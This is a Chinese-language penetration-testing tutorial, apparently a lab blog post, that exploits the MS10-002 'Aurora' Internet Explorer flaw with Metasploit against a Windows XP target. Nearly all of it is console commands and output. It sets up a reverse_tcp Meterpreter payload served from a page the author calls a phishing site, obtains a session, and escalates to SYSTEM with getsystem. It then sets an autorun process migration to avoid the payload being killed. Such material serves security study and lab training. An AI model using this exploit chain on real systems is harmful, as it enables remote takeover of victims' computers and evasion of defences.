一、MS10_002极光漏洞
本文简单介绍了如何使用metasploit针对ms10_002(极光漏洞)进行渗透测试,仅供学习
| 测试环境 | 描述 | ip |
|---|---|---|
| 主机 | kali2020 | 192.168.1.113 |
| 目标主机 | win xp sp3 | 192.168.1.106 |
①启动msf,搜索ms10_002,使用msf中的exploit攻击模块,设置参数
msf6 > search ms10_002
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/browser/ms10_002_aurora 2010-01-14 normal No MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
1 exploit/windows/browser/ms10_002_ie_object 2010-01-21 normal No MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free
Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/browser/ms10_002_ie_object
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > options
Module options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address o
n the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.113 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/browser/ms10_002_aurora) > set srvport 80
srvport => 80
msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443
lport => 443
msf6 exploit(windows/browser/ms10_002_aurora) > set uripath /
uripath => /
msf6 exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.113:443
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.113:80/
msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.
②提示已经在本机80端口开启钓鱼网站,打开靶机的浏览器输入192.168.1.106
③主机成功渗透靶机,获取meterpreter权限
msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.
[*] 192.168.1.109 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.106 ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.106:4278) at 2021-06-07 13:25:17 +0800
msf6 exploit(windows/browser/ms10_002_aurora) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows WINXP-1\st21 @ WINXP-1 192.168.1.113:443 -> 192.168.1.106:4278 (192.168.1.10
6)
msf6 exploit(windows/browser/ms10_002_ie_object) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WINXP-1\st21
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
二、高级属性
使用advanced查看高级属性
msf6 exploit(windows/browser/ms10_002_aurora) > advanced
Module advanced options (exploit/windows/browser/ms10_002_aurora):
Name Current Setting Required Description
---- --------------- -------- -----------
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
ListenerComm no The specific communication channel to use for this service
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Payload advanced options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the proces
s
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in se
conds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for
HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunS
cript)
PayloadBindPort no Port to bind reverse tcp socket to on target system.
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requi
res tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the U
UID
PayloadUUIDSeed no A string to use when generating the payload UUID (determinist
ic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back w
ill NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPO
RT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session shou
ld be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly
shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if Ena
bleStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not c
ompatible
StagerRetryCount 10 no The number of times the stager should retry if the first conn
ect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect at
tempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
例如,在连接到目标电脑后迅速迁移到其他进程,防止被杀:
msf6 exploit(windows/browser/ms10_002_aurora) > set autorunscript migrate -f
autorunscript => migrate -f